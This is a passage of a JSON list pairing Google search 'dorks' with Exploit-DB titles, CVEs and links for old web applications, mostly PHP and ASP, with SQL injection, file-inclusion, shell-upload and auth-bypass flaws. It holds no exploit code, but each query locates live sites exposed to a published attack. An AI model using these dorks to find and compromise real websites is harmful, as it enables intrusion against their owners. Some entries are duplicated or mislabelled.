https://www.exploit-db.com/exploits/4127"}, {"dork": "intext:\" Website Design and Hosting By Netricks, Inc.\"", "description": "Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12736"}, {"dork": "com_thyme", "description": "Joomla Component Thyme 1.0 (event) SQL Injection Vulnerability - CVE: 2008-6116: https://www.exploit-db.com/exploits/7182"}, {"dork": "\"PHP WEBQUEST VERSION \" or inurl:\"/phpwebquest/\"", "description": "PHP Webquest 2.6 Get Database Credentials Vulnerability - CVE: 2008-0249: https://www.exploit-db.com/exploits/4872"}, {"dork": "All right reserved 2002-2003 (MSN/Web Server Creator)", "description": "Web Server Creator - Web Portal v 0.1 Multi Vulnerability - CVE: 2010-1113: https://www.exploit-db.com/exploits/11569"}, {"dork": "\"Powerd by www.e-webtech.com\"", "description": "e-webtech (page.asp) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12571"}, {"dork": "powered by PhpMesFilms", "description": "PhpMesFilms 1.0 (index.php id) Remote SQL Injection Vulnerability - CVE: 2009-0598: https://www.exploit-db.com/exploits/7660"}, {"dork": "\"Internet Photoshow - Slideshow\"", "description": "Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln - CVE: 2008-2282: https://www.exploit-db.com/exploits/5617"}, {"dork": "inurl:choosecard.php?catid=", "description": "WEBBDOMAIN Post Card 1.02 (catid) SQL Injection Vulnerability - CVE: 2008-6622: https://www.exploit-db.com/exploits/6977"}, {"dork": "\"Powered by Real Estate Portal\"", "description": "NetArtMedia Real Estate Portal 1.2 (ad_id) SQL Injection Vuln - CVE: 2008-5309: https://www.exploit-db.com/exploits/7208"}, {"dork": "inurl:browsecats.php?cid=", "description": "PozScripts Classified Ads Script (cid) SQL Injection Vulnerability - CVE: 2008-3672: https://www.exploit-db.com/exploits/6169"}, {"dork": "inurl:com_mdigg", "description": "Joomla Component mdigg 2.2.8 (category) SQL Injection Vuln - CVE: 2008-6149: https://www.exploit-db.com/exploits/7574"}, {"dork": "inurl:trr.php?id=", "description": "Ad Board (id) Remote SQL Injection Vulnerability - CVE: 2008-3725: https://www.exploit-db.com/exploits/6271"}, {"dork": "inurl:\"kroax.php?category\"", "description": "PHP-Fusion Mod Kroax 4.42 (category) SQL Injection Vulnerability - CVE: 2008-5196: https://www.exploit-db.com/exploits/5942"}, {"dork": "\"Powered by Reciprocal Links Manager\"", "description": "Reciprocal Links Manager 1.1 (site) SQL Injection Vulnerability - CVE: 2008-4086: https://www.exploit-db.com/exploits/6349"}, {"dork": "intext:\"Powered by eDocStore\"", "description": "eDocStore (doc.php doc_id) Remote SQL Injection Vulnerability - CVE: 2007-3452: https://www.exploit-db.com/exploits/4108"}, {"dork": "Powered by AM4SS 1.0", "description": "Advneced Management For Services Sites (File Disclosure) Vulnerabilities: https://www.exploit-db.com/exploits/12859"}, {"dork": "\"Powered by AlstraSoft SendIt Pro\"", "description": "AlstraSoft SendIt Pro Remote File Upload Vulnerability - CVE: 2008-6932: https://www.exploit-db.com/exploits/7101"}, {"dork": "inurl:com_content", "description": "Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln - CVE: 2008-6923: https://www.exploit-db.com/exploits/6025"}, {"dork": "inurl:\"index.php?option=com_huruhelpdesk\"", "description": "Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability - CVE: 2010-2907: https://www.exploit-db.com/exploits/14449"}, {"dork": "Powered by Article Directory", "description": "Authenication Bypass Vulnerability in Articles Directory: https://www.exploit-db.com/exploits/12445"}, {"dork": "\"Copyright 2005 Affiliate Directory\"", "description": "SFS Affiliate Directory (id) SQL Injection Vulnerability - CVE: 2008-3719: https://www.exploit-db.com/exploits/6270"}, {"dork": "inurl:\"index.php?option=com_bookjoomlas\"", "description": "Joomla Component com_bookjoomlas 0.1 SQL Injection Vulnerability - CVE: 2009-1263: https://www.exploit-db.com/exploits/8353"}, {"dork": "DevMass Shopping Cart", "description": "DevMass Shopping Cart 1.0 Remote File Include Vulnerability - CVE: 2007-6133: https://www.exploit-db.com/exploits/4642"}, {"dork": "inurl:index.php?option=com_allhotels", "description": "Joomla Component com_allhotels (id) Blind SQL Injection Vulnerability - CVE: 2008-5874: https://www.exploit-db.com/exploits/7568"}, {"dork": "\"powered by aflog\"", "description": "aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies - CVE: 2008-4784: https://www.exploit-db.com/exploits/6818"}, {"dork": "inurl:\"index.php?option=com_simplefaq\"", "description": "Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability - CVE: 2007-4456: https://www.exploit-db.com/exploits/4296"}, {"dork": "inurl:couponsite/index.php?page=", "description": "Coupon Script 4.0 (id) Remote SQL Injection Vulnerability - CVE: 2008-4090: https://www.exploit-db.com/exploits/6348"}, {"dork": "inurl:\"directory.php?ax=list\" gaming", "description": "Gaming Directory 1.0 (cat_id) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5374"}, {"dork": "\"script by RECIPE SCRIPT\"", "description": "The Recipe Script 5 Remote XSS Vulnerability: https://www.exploit-db.com/exploits/8967"}, {"dork": "inurl:\"index.php?option=com_jobline\"", "description": "Joomla Component Jobline 1.3.1 Blind SQL Injection Vulnerability - CVE: 2009-2554: https://www.exploit-db.com/exploits/9187"}, {"dork": "Dosya Yukle Scrtipi v1.0", "description": "Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability: https://www.exploit-db.com/exploits/11620"}, {"dork": "allinurl: modules-php-op-modload \"req view_cat\"", "description": "PHP-Nuke Module books SQL (cid) Remote SQL Injection Vulnerability - CVE: 2008-0827: https://www.exploit-db.com/exploits/5147"}, {"dork": "\"Powered by Absolute File Send\"", "description": "Absolute File Send 1.0 Remote Cookie Handling Vulnerability: https://www.exploit-db.com/exploits/6881"}, {"dork": "inurl:wapmain.php?option=", "description": "Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12440"}, {"dork": "allinurl:\"com_na_content\"", "description": "Mambo Component Sermon 0.2 (gid) SQL Injection Vulnerability - CVE: 2008-0721: https://www.exploit-db.com/exploits/5076"}, {"dork": "inurl:\"com_jcalpro\"", "description": "Joomla Component com_jcalpro 1.5.3.6 Remote File Inclusion - CVE: 2009-4431: https://www.exploit-db.com/exploits/10587"}, {"dork": "Powered by Webiz", "description": "(Webiz) local SHELL Upload Vulnerability: https://www.exploit-db.com/exploits/12797"}, {"dork": "inurl:category.php?cate_id=", "description": "GC Auction Platinum (cate_id) Remote SQL Injection Vulnerability - CVE: 2008-3413: https://www.exploit-db.com/exploits/6144"}, {"dork": "CaLogic Calendars V1.2.2", "description": "CaLogic Calendars 1.2.2 (CLPath) Remote File Include Vulnerabilities - CVE: 2006-2570: https://www.exploit-db.com/exploits/1809"}, {"dork": "\"Powered by Rock Band CMS 0.10\"\t", "description": "BandCMS 0.10 news.php Multiple SQL Injection Vulnerabilities - CVE: 2009-3252: https://www.exploit-db.com/exploits/9553"}, {"dork": "Copyright Acme 2008", "description": "AJ HYIP ACME (news.php id) Remote SQL Injection Vulnerability - CVE: 2008-2893: https://www.exploit-db.com/exploits/5890"}, {"dork": "\"Creative Guestbook\"", "description": "Creative Guestbook 1.0 Multiple Remote Vulnerabilities - CVE: 2007-1479: https://www.exploit-db.com/exploits/3489"}, {"dork": "\"DeeEmm CMS\"", "description": "DeeEmm CMS (DMCMS) 0.7.4 Multiple Remote Vulnerabilities - CVE: 2008-3721: https://www.exploit-db.com/exploits/6250"}, {"dork": "powered by vBulletin 4.0.4", "description": "VBbuletin 4.0.4 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/14686"}, {"dork": "\"Vivid Ads Shopping Cart\"", "description": "Vivid Ads Shopping Cart (prodid) Remote SQL Injection: https://www.exploit-db.com/exploits/10297"}, {"dork": "inurl:\"/rbfminc/\"", "description": "RogioBiz_PHP_file_manager_V1.2 bypass admin: https://www.exploit-db.com/exploits/11731"}, {"dork": "intext:Powered by AWCM v2.1", "description": "AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities - CVE: 2009-3219: https://www.exploit-db.com/exploits/9237"}, {"dork": "\"Powered By AlstraSoft AskMe Pro\"", "description": "AlstraSoft AskMe Pro 2.1 Multiple SQL Injection Vulnerabilities - CVE: 2008-2902: https://www.exploit-db.com/exploits/5821"}, {"dork": "allinurl:\"com_neogallery\"", "description": "Joomla Component NeoGallery 1.1 SQL Injection Vulnerability - CVE: 2008-0752: https://www.exploit-db.com/exploits/5083"}, {"dork": "inurl:\"com_category\"", "description": "Joomla Component com_category (catid) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9126"}, {"dork": "\"Powered By Zoopeer\"", "description": "Zoopeer 0.1 & 0.2 (fckeditor) Shell Upload Vulnerability: https://www.exploit-db.com/exploits/15354"}, {"dork": "inurl:index.php?ortupg=", "description": "CMS Ortus 1.13 Remote SQL Injection Vulnerability - CVE: 2008-6282: https://www.exploit-db.com/exploits/7237"}, {"dork": "inurl:com_jomtube", "description": "Joomla Component com_jomtube (user_id) Blind SQL Injection / SQL Injection: https://www.exploit-db.com/exploits/14434"}, {"dork": "\"Powered by web directory script\"", "description": "Web Directory Script 1.5.3 (site) SQL Injection Vulnerability - CVE: 2008-4091: https://www.exploit-db.com/exploits/6335"}, {"dork": "inurl:com_gigcal", "description": "Joomla Component com_gigcal (gigcal_gigs_id) SQL Injection Vuln - CVE: 2009-0726: https://www.exploit-db.com/exploits/7746"}, {"dork": "Powered MarketSaz", "description": "MarketSaz remote file Upload Vulnerability: https://www.exploit-db.com/exploits/13927"}, {"dork": "inurl:com_ezautos", "description": "Joomla Component (com_ezautos) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/15085"}, {"dork": "\"Designed & Developed by Zeeways.com\"", "description": "zeeproperty 1.0 (Upload/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6915: https://www.exploit-db.com/exploits/7058"}, {"dork": "inurl:option=com_education_classes", "description": "joomla component education SQL injection Vulnerability: https://www.exploit-db.com/exploits/12153"}, {"dork": "allinurl:\"lyrics_menu/lyrics_song.php?l_id=\"", "description": "e107 Plugin lyrics_menu (lyrics_song.php l_id) SQL Injection Vulnerability - CVE: 2008-4906: https://www.exploit-db.com/exploits/6885"}, {"dork": "infusions/recept/recept.php?", "description": "PHP-Fusion Mod recept (kat_id) SQL Injection Vulnerability - CVE: 2008-4527: https://www.exploit-db.com/exploits/6683"}, {"dork": "\"Powered By diskos\"", "description": "Diskos CMS Manager (SQL/DB/Auth Bypass) Multiple Vulnerabilities - CVE: 2009-4798: https://www.exploit-db.com/exploits/8307"}, {"dork": "Copyright 2006 \u00c2\u00a9 Flax Article Manager v1.1", "description": "Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability - CVE: 2009-0284: https://www.exploit-db.com/exploits/7862"}, {"dork": "Powered by PHP Image Gallery", "description": "SoftComplex PHP Image Gallery 1.0 (Auth Bypass) SQL Injection Vuln - CVE: 2008-6488: https://www.exploit-db.com/exploits/7021"}, {"dork": "Powered By Pligg | Legal: License and Source", "description": "Pligg CMS 9.9.0 (story.php id) Remote SQL Injection Vulnerability - CVE: 2008-3366: https://www.exploit-db.com/exploits/6146"}, {"dork": "inurl:/_blogadata/", "description": "Blogator-script 0.95 Change User Password Vulnerability - CVE: 2008-6473: https://www.exploit-db.com/exploits/5370"}, {"dork": "inurl:\"com_a6mambocredits\"", "description": "Mambo a6mambocredits Component 1.0.0 File Include Vulnerability - CVE: 2006-4288: https://www.exploit-db.com/exploits/2207"}, {"dork": "\"index.php?id_menu=\" CMScontrol", "description": "CMScontrol (Content Management Portal Solutions) Sql Injection - CVE: 2009-3326: https://www.exploit-db.com/exploits/9727"}, {"dork": "inurl:\"com_eventcal\"", "description": "Joomla eventcal Component 1.6.4 com_eventcal Blind SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14187"}, {"dork": "\"and Powered By :Sansak\"", "description": "WebBoard 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability: https://www.exploit-db.com/exploits/6303"}, {"dork": "inurl:profile.php?mode=", "description": "PHPBB MOD [2.0.19] Invitation Only (PassCode Bypass vulnerability): https://www.exploit-db.com/exploits/14440"}, {"dork": "Powered By SalSa Creations", "description": "ClipShare Pro 2006-2007 (chid) SQL Injection Vulnerability - CVE: 2008-5489: https://www.exploit-db.com/exploits/7128"}, {"dork": "inurl:modules.php?op= \"pollID\"", "description": "MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability - CVE: 2009-2618: https://www.exploit-db.com/exploits/9021"}, {"dork": "\"Powered by SazCart\"", "description": "SazCart 1.5.1 (prodid) Remote SQL Injection - CVE: 2008-2411: https://www.exploit-db.com/exploits/5576"}, {"dork": "intext:\"Powered by Max.Blog\"", "description": "Max.Blog 1.0.6 (offline_auth.php) Offline Authentication Bypass - CVE: 2009-0409: https://www.exploit-db.com/exploits/7899"}, {"dork": "\"Powered by CMSimple\"", "description": "CMSimple 3.1 Local File Inclusion / Arbitrary File Upload - CVE: 2008-2650: https://www.exploit-db.com/exploits/5700"}, {"dork": "inurl:\"com_performs\"", "description": "perForms Mambo Component 1.0 Remote File Inclusion - CVE: 2006-3774: https://www.exploit-db.com/exploits/2025"}, {"dork": "inurl:\"com_mambowiki\"", "description": "Mambo MamboWiki Component 0.9.6 Remote Include Vulnerability - CVE: 2006-4282: https://www.exploit-db.com/exploits/2213"}, {"dork": "index.asp?archivio=OK", "description": "Ublog access version Arbitrary Database Disclosure: https://www.exploit-db.com/exploits/8610"}, {"dork": "album.asp?pic= .jpg cat=", "description": "aspWebAlbum 3.2 Multiple Remote Vulnerabilities - CVE: 2008-6977: https://www.exploit-db.com/exploits/6420"}, {"dork": "\"Multi-Page Comment System\"", "description": "Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability - CVE: 2008-2293: https://www.exploit-db.com/exploits/5630"}, {"dork": "inurl:\"com_wmtpic\"", "description": "Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14128"}, {"dork": "inurl:index.php?mode=game_player", "description": "Tycoon CMS Record Script SQL Injection Vulnerability - CVE: 2010-3027: https://www.exploit-db.com/exploits/14572"}, {"dork": "album.asp?pic= .jpg cat=", "description": "aspWebAlbum 3.2 (Upload/SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6977: https://www.exploit-db.com/exploits/6357"}, {"dork": "inurl:\"option=com_simpleshop\" & inurl:\"viewprod\"", "description": "Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14501"}, {"dork": "intext:\"Powered by Community CMS\"", "description": "Community CMS 0.5 Multiple SQL Injection Vulnerabilities - CVE: 2009-4794: https://www.exploit-db.com/exploits/8323"}, {"dork": "\"Powered by Scallywag\"", "description": "Scallywag (template.php path) Remote File Inclusion Vulnerabilities - CVE: 2007-2900: https://www.exploit-db.com/exploits/3972"}, {"dork": "inurl:\"phshoutbox.php\"", "description": "PhShoutBox 1.5 (final) Insecure Cookie Handling Vulnerability - CVE: 2008-1971: https://www.exploit-db.com/exploits/5467"}, {"dork": "\"index.php?option=com_seyret\" / \"com_seyret\"", "description": "Joomla Component Seyret (com_seyret) - Local File Inclusion Vulnerability: https://www.exploit-db.com/exploits/14183"}, {"dork": "inurl:inc_memberdirectorymanager.asp", "description": "DMXReady Member Directory Manager 1.1 SQL Injection Vulnerability - CVE: 2009-0427: https://www.exploit-db.com/exploits/7773"}, {"dork": "inurl:\"mod=notizie\"", "description": "XCMS 1.83 Remote Command Execution - CVE: 2007-6652: https://www.exploit-db.com/exploits/4813"}, {"dork": "\"Powered By ScozNews\"", "description": "ScozNews 1.2.1 (mainpath) Remote File Inclusion Vulnerability - CVE: 2006-2487: https://www.exploit-db.com/exploits/1800"}, {"dork": "\"PHP BP Team\"", "description": "phpBP RC3 (2.204) FIX4 Remote SQL Injection Vulnerability - CVE: 2008-1408: https://www.exploit-db.com/exploits/5263"}, {"dork": "inurl:\"zcat.php?id=\"", "description": "IRAN N.E.T E-commerce Group SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10350"}, {"dork": "inurl:K-Search, Powered By K-Search", "description": "K-Search (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2010-2457: https://www.exploit-db.com/exploits/13993"}, {"dork": "inurl:\"com_mscomment\"", "description": "Joomla Component MS Comment LFI Vulnerability - CVE: 2010-2050: https://www.exploit-db.com/exploits/12611"}, {"dork": "Powered by Mitra Informatika Solusindo", "description": "Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5214"}, {"dork": "2009 \u00a9 Satellite-X", "description": "Satellite-X 4.0 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11962"}, {"dork": "\"Powered by bSpeak 1.10\"", "description": "bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability - CVE: 2009-1747: https://www.exploit-db.com/exploits/8751"}, {"dork": "Powered by osCommerce", "description": "osCommerce Online Merchant 2.2 RC2a Code Execution: https://www.exploit-db.com/exploits/9556"}, {"dork": "inurl:choosecard.php?catid=", "description": "post Card ( catid ) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11892"}, {"dork": "inurl:\"com_jphoto\"", "description": "Joomla Component com_jphoto SQL Injection Vulnerability - (id) - CVE: 2009-4598: https://www.exploit-db.com/exploits/10367"}, {"dork": "allinurl: e107_plugins/easyshop/easyshop.php", "description": "e107 Plugin EasyShop (category_id) Blind SQL Injection - CVE: 2008-4786: https://www.exploit-db.com/exploits/6852"}, {"dork": "inurl:\"com_koesubmit\"", "description": "Mambo com_koesubmit 1.0.0 Remote File Inclusion - CVE: 2009-3333: https://www.exploit-db.com/exploits/9714"}, {"dork": "inurl:add_soft.php", "description": "Hotscripts Clone (cid) Remote SQL Injection Vulnerability - CVE: 2008-6405: https://www.exploit-db.com/exploits/6545"}, {"dork": "\"Powered by Absolute Podcast\"", "description": "Absolute Podcast 1.0 Remote Insecure Cookie Handling Vulnerability - CVE: 2008-6857: https://www.exploit-db.com/exploits/6882"}, {"dork": "\"Copyright-2008@zeejobsite.com\"", "description": "ZEEJOBSITE 2.0 Remote File Upload Vulnerability - CVE: 2008-6913: https://www.exploit-db.com/exploits/7062"}, {"dork": "inurl:\"index.php?option=com_jp_jobs\"", "description": "Joomla component jp_jobs SQL Injection Vulnerability - CVE: 2010-1350: https://www.exploit-db.com/exploits/12037"}, {"dork": "http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+Category.php%3FIndustrYID%3D", "description": "CmS (id) SQL Injection Vulnerability - CVE: 2009-2439: https://www.exploit-db.com/exploits/12333"}, {"dork": "index2.php?option=com_joomlaboard", "description": "Joomla Component Joomlaboard 1.1.1 (sbp) RFI Vulnerability: https://www.exploit-db.com/exploits/3560"}, {"dork": "inurl:\"cameralife/index.php\"", "description": "Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: https://www.exploit-db.com/exploits/6710"}, {"dork": "inurl:option=com_huruhelpdesk", "description": "joomla component allvideos BLIND SQL injection Vulnerability: https://www.exploit-db.com/exploits/12137"}, {"dork": "inurl:inc_membersareamanager.asp", "description": "DMXReady Members Area Manager 1.2 SQL Injection Vulnerability: https://www.exploit-db.com/exploits/7774"}, {"dork": "\"Tanyakan Pada Rumput Yang Bergoyang\"", "description": "Moa Gallery 1.2.0 Multiple Remote File Inclusion Vulnerabilities - CVE: 2009-4614: https://www.exploit-db.com/exploits/9522"}, {"dork": "inurl:/component/jesectionfinder/", "description": "Joomla Component JE Section Finder LFI Vulnerability - CVE: 2010-2680: https://www.exploit-db.com/exploits/14064"}, {"dork": "intitle:phpMyAdmin", "description": "phpMyAdmin Code Injection RCE - CVE: 2009-1151: https://www.exploit-db.com/exploits/8992"}, {"dork": "inurl:\"com_phocagallery\"", "description": "Joomla Phoca Gallery Component (com_phocagallery) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14207"}, {"dork": "inurl:\"member.php?page=comments\"", "description": "6ALBlog (newsid) Remote SQL Injection Vulnerability - CVE: 2007-3451: https://www.exploit-db.com/exploits/4104"}, {"dork": "''webboard question.asp QID''", "description": "PORAR WEBBOARD (question.asp) Remote SQL Injection Vulnerability - CVE: 2008-1039: https://www.exploit-db.com/exploits/5185"}, {"dork": "inurl:\"index.php?option=com_ponygallery\"", "description": "Joomla Component Pony Gallery 1.5 SQL Injection Vulnerability - CVE: 2007-4046: https://www.exploit-db.com/exploits/4201"}, {"dork": "\"PowerMovieList 0.14 Beta Copyright\"", "description": "PowerMovieList 0.14b (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8062"}, {"dork": "\"powered by MODx\"", "description": "MODx CMS 0.9.2.1 (FCKeditor) Remote File Include Vulnerability - CVE: 2006-5730: https://www.exploit-db.com/exploits/2706/"}, {"dork": "\"Powered by words tag script\"", "description": "Words tag script 1.2 (word) Remote SQL Injection Vulnerability - CVE: 2008-3945: https://www.exploit-db.com/exploits/6336"}, {"dork": "FrontAccounting", "description": "FrontAccounting 1.12 Build 31 Remote File Inclusion Vulnerability - CVE: 2007-4279: https://www.exploit-db.com/exploits/4269"}, {"dork": "Powered by Egorix", "description": "EPOLL SYSTEM 3.1 (password.dat) Disclosure: https://www.exploit-db.com/exploits/7864"}, {"dork": "inurl:\"kgb19\"", "description": "KGB 1.9 (sesskglogadmin.php) Local File Include - CVE: 2007-0337: https://www.exploit-db.com/exploits/3134"}, {"dork": "allinurl:buyer/index.php?ProductID=", "description": "Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12609"}, {"dork": "\"powered by Sitellite\"", "description": "Sitellite CMS 4.2.12 (559668.php) Remote File Inclusion Vulnerability - CVE: 2007-3228: https://www.exploit-db.com/exploits/4071"}, {"dork": "\"Powered by Comdev News Publisher\"", "description": "Comdev News Publisher Remote SQL Injection Vulnerability - CVE: 2008-1872: https://www.exploit-db.com/exploits/5362"}, {"dork": "Powered By: AJ Square Inc", "description": "AJ Article Persistent XSS Vulnerability - CVE: 2010-2917: https://www.exploit-db.com/exploits/14354"}, {"dork": "inurl:option=com_huruhelpdesk", "description": "joomla component huruhelpdesk SQL injection Vulnerability: https://www.exploit-db.com/exploits/12124"}, {"dork": "inurl:inc_securedocumentlibrary.asp", "description": "DMXReady Secure Document Library 1.1 Remote SQL Injection Vuln - CVE: 2009-0428: https://www.exploit-db.com/exploits/7787"}, {"dork": "Powered by Dolphin", "description": "Dolphin v7.0.3 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/15400"}, {"dork": "inurl:\"php/showContent.php?linkid=\"", "description": "Worldviewer.com CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12163"}, {"dork": "sitou timou tumou tou", "description": "Drunken:Golem Gaming Portal (admin_news_bot.php) RFI Vulnerability - CVE: 2009-4622: https://www.exploit-db.com/exploits/9635"}, {"dork": "inurl:index.php?option=com_lowcosthotels", "description": "Joomla Component com_lowcosthotels (id) Blind SQL Injection Vuln - CVE: 2008-5864: https://www.exploit-db.com/exploits/7567"}, {"dork": "Vibro-School CMS by nicLOR.net", "description": "Vibro-School-CMS (nID) Remote SQL injection Vulnerability - CVE: 2008-6795: https://www.exploit-db.com/exploits/6981"}, {"dork": "\"Absolute Poll Manager XE\"", "description": "Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability - CVE: 2008-6860: https://www.exploit-db.com/exploits/6883"}, {"dork": "Copyright 2010. Software Index", "description": "PishBini Footbal XSS and SQL Injection Vulnerability: https://www.exploit-db.com/exploits/14000"}, {"dork": "inurl:\"com_linkdirectory\"", "description": "Joomla Link Directory Component 1.0.3 Remote Include Vulnerability: https://www.exploit-db.com/exploits/2214"}, {"dork": "inurl:com_manager", "description": "Joomla Component com_manager 1.5.3 (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12257"}, {"dork": "\"Developed by Infoware Solutions\"", "description": "My PHP Dating (success_story.php id) SQL Injection Vulnerability - CVE: 2008-4705: https://www.exploit-db.com/exploits/6754"}, {"dork": "allinurl:\"verliadmin\"", "description": "VerliAdmin 0.3 (index.php) Remote File Include - CVE: 2006-6666: https://www.exploit-db.com/exploits/2944"}, {"dork": "\"Powered by UNAK-CMS\"", "description": "UNAK-CMS 1.5 (dirroot) Remote File Include Vulnerabilities - CVE: 2006-4890: https://www.exploit-db.com/exploits/2380"}, {"dork": "inurl:\"com_quickfaq\"", "description": "Joomla QuickFAQ Component (com_quickfaq) Blind SQL Injection Vulnerability - CVE: 2010-2845: https://www.exploit-db.com/exploits/14296"}, {"dork": "\"Powered by EZCMS\"", "description": "EZCMS 1.2 (bSQL/Admin Byapss) Multiple Remote Vulnerabilities - CVE: 2008-2921: https://www.exploit-db.com/exploits/5819"}, {"dork": "inurl:index.php?menu=adorder", "description": "ACG-PTP 1.0.6 (adid) Remote SQL Injection Vulnerability - CVE: 2008-3944: https://www.exploit-db.com/exploits/6362"}, {"dork": "allinurl:\"com_accombo\"", "description": "Mambo Component accombo 1.x (id) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/5279"}, {"dork": "\"Powered by Scratcher\"", "description": "Scratcher (SQL/XSS) Multiple Remote Vulnerability - CVE: 2010-1742: https://www.exploit-db.com/exploits/12458"}, {"dork": "\"Powered by How2asp\"", "description": "How2ASP.net Webboard 4.1 Remote SQL Injection Vulnerability - CVE: 2008-2417: https://www.exploit-db.com/exploits/5638"}, {"dork": "\"Powered by PHPBasket\"", "description": "PHPBasket (product.php pro_id) SQL Injection Vulnerability - CVE: 2008-3713: https://www.exploit-db.com/exploits/6258"}, {"dork": "\"Powered by Dayfox Designs\"", "description": "Dayfox Blog 4 (postpost.php) Remote Code Execution Vulnerability - CVE: 2007-1525: https://www.exploit-db.com/exploits/3478"}, {"dork": "\"PHPNews Version 0.93\"", "description": "PHPNews 0.93 (format_menue) Remote File Inclusion Vulnerability - CVE: 2007-4232: https://www.exploit-db.com/exploits/4268"}, {"dork": "\"/nuke/iframe.php\"", "description": "iFrame for Phpnuke (iframe.php) Remote File Inclusion Vulnerability - CVE: 2007-1626: https://www.exploit-db.com/exploits/3512"}, {"dork": "Sad Raven's Click Counter v1.0", "description": "Sad Raven's Click Counter 1.0 passwd.dat Disclosure: https://www.exploit-db.com/exploits/7844"}, {"dork": "Powered by dB Masters' Curium CMS 1", "description": "dB Masters Curium CMS 1.03 (c_id) Remote SQL Injection Vulnerability - CVE: 2007-0765: https://www.exploit-db.com/exploits/3256"}, {"dork": "Powered by XT-Commerce", "description": "XT-Commerce v1 Beta 1 by Pass / Creat and Download Backup Vulnerability: https://www.exploit-db.com/exploits/12447"}, {"dork": "\"Yogurt build\"", "description": "Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities - CVE: 2009-2033: https://www.exploit-db.com/exploits/8932"}, {"dork": "inurl:e107_plugins", "description": "e107 Code Exec - CVE: 2010-2099: https://www.exploit-db.com/exploits/12715"}, {"dork": "\"Scientific Image DataBase\"", "description": "Scientific Image DataBase 0.41 Blind SQL Injection - CVE: 2008-2834: https://www.exploit-db.com/exploits/5885"}, {"dork": "Powered by phpMyRealty", "description": "phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability - CVE: 2007-6472: https://www.exploit-db.com/exploits/4750"}, {"dork": "\"Powered by myUPB\"", "description": "myUPB v2.2.6 Multiple Vulnerabilities: https://www.exploit-db.com/exploits/13957"}, {"dork": "inurl:\"com_simpledownload\"", "description": "Joomla Component simpledownload LFI Vulnerability - CVE: 2010-2122: https://www.exploit-db.com/exploits/12618"}, {"dork": "Powered by Flinx", "description": "flinx 1.3 (category.php id) Remote SQL Injection Vulnerabilit - CVE: 2008-0468: https://www.exploit-db.com/exploits/4985"}, {"dork": "allinurl:\"com_restaurante\"", "description": "Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability - CVE: 2008-1465: https://www.exploit-db.com/exploits/5280"}, {"dork": "Powered by MyHobbySite 1.01", "description": "MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability: https://www.exploit-db.com/exploits/14977"}, {"dork": "inurl:index.php?myPlantId=", "description": "Member ID The Fish Index PHP SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12850"}, {"dork": "\"powered by real-estate-website\"", "description": "Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/5763"}, {"dork": "\"This site is powered by CMS Made Simple version 1.2.2\"", "description": "CMS Made Simple 1.2.2 (TinyMCE module) SQL Injection Vuln - CVE: 2007-6656: https://www.exploit-db.com/exploits/4810"}, {"dork": "infusions/manuals/manuals.php?manual=", "description": "PHP-Fusion Mod manuals (manual) Remote SQL Injection Vulnerability: https://www.exploit-db.com/exploits/6681"}, {"dork": "allinurl:/modernbill/", "description": "Modernbill 1.6 (config.php) Remote File Include Vulnerability - CVE: 2006-4034: https://www.exploit-db.com/exploits/2127"}, {"dork": "Powered by EasySiteNetwork", "description": "Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability - CVE: 2007-6580: https://www.exploit-db.com/exploits/4770"}, {"dork": "inurl:\"main_forum.php?cat=\"", "description": "GeN3 forum V1.3 SQL Injection Vulnerability - CVE: 2009-4263: https://www.exploit-db.com/exploits/10299"}, {"dork": "\"eCommerce Engine \u00a9 2006 xt:Commerce Shopsoftware\"", "description": "xt:Commerce Shopsoftware (fckeditor) Arbitrary File Upload Vulnerability: https://www.exploit-db.com/exploits/15455"}, {"dork": "intitle:\"Powered by Open Bulletin Board\"", "description": "Open Bulletin Board Multiple Blind Sql Injection 